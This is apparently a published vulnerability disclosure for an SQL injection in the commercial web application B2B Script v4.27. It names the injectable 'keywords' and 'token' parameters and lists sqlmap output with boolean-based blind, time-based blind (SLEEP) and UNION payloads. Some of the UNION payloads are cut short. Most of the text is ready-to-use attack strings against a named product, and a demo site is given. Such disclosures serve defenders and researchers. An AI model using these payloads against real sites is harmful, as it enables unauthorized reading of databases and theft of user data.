B2B Script v4.27 - SQL Injection - 18.01.2017
An attacker can exploit this vulnerability to read from the database. The parameters ‘keywords’ and ‘token’ are vulnerable.
# Vulnerability: B2B Script v4.27 - SQL Injection
# Date: 18.01.2017
# Software link: http://itechscripts.com/b2b-script/
# Demo: http://b2b.itechscripts.com
# Price: 199$
# Category: webapps
# Exploit Author: Dawid Morawski
# Website: http://www.morawskiweb.pl
# Contact: dawidmorawski1990@gmail.com
1. Description
An attacker can exploit this vulnerability to read from the database.
2. SQL Injection / Proof of Concept:
SQLmap outout:
Parameter: keywords (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: keywords=-7908’) OR 3641=3641#
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: keywords=Products’) UNION ALL SELECT
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
SQLmap outout:
Parameter: token (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d’ AND 9125=9125 AND ‘HhOm’=’HhOm
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: token=7532a5bfc9e07964f8dddeb95fc584cd965d’ AND SLEEP(5) AND ‘dWKJ’=’dWKJ
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: token=-7417’ UNION ALL SELECT